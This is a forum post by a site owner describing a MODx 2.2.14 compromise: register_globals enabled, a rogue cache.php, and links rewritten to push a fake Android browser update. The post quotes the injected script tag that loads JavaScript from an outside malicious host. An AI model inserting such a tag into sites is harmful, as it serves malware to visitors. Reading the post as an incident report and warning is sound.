I am running MODx 2.2.14-pl. I have recently had this happen to me. I am absolutely certain it was not an FTP credential compromise. I do not know how the compromise happened, but I'm certain it wasn't uploaded via FTP; some other mechanism appears to be at work.
I've done an extensive postmortem of the hacked site. Here is the information I've gleaned:
The hacked site was hosted on a shared server on Hostgator. On or around the same time as the hack took place, the site's php.ini file was modified to turn on register_globals.
A file called cache.php was created in the Assets folder that contained this line of code.
Other files were modified to tamper with the site in a subtle and interesting way in an attempt to spread malware:
1. Directly visiting any URL on the site would serve up the normal page.
2. Clicking on any link on the site to another page on the site would cause a malicious JavaScript to be injected into the HTML just before the closing BODY tag:
<noindex>
<script src="
http://stat.rolledwil.biz/stat.php?1921853954"></script>
</noindex>
3. The malicious JavaScript would examine the user-agent header of the requesting browser. For desktop browsers or mobile browsers other than Android 4.1 or eariler, it would return a 404. Formobile browsers that are running under Android 4.1 or earlier, it would pop up a JavaScript alert reading
Warning! You must update Web browser! Update now?
People who clicked the "OK" button in the alert would be redirected to a site that downloaded malware disguised as an Android browser update.
The site from which this malicious Javascript is being served is hosted on Digital Ocean and its content is served over the Cloudflare CDN. I have reached out to both companies. Neither Digital Ocean nor Cloudflare have expressed any interest in resolving the issue. It is still ongoing as I write this.
I have reuploaded known clean copies of MODx 2.2.14, changed my hosting and FTP credentials, and the problem has returned twice after taking both actions. I have reached out to Hostgator to see if there is a problem with another site or a server configuration issue on the shared hosting box the site lives on, but so far they have not found anything. I suspect this is a (possibly subtle and deeply buried) vulnerability in MODx 2.2.14 that goes back at least as far as 2.2.6.
I've attached a screen grab of what happens when a compromised server is visited in Android. I urge MODx users to check for the existence of this malicious file.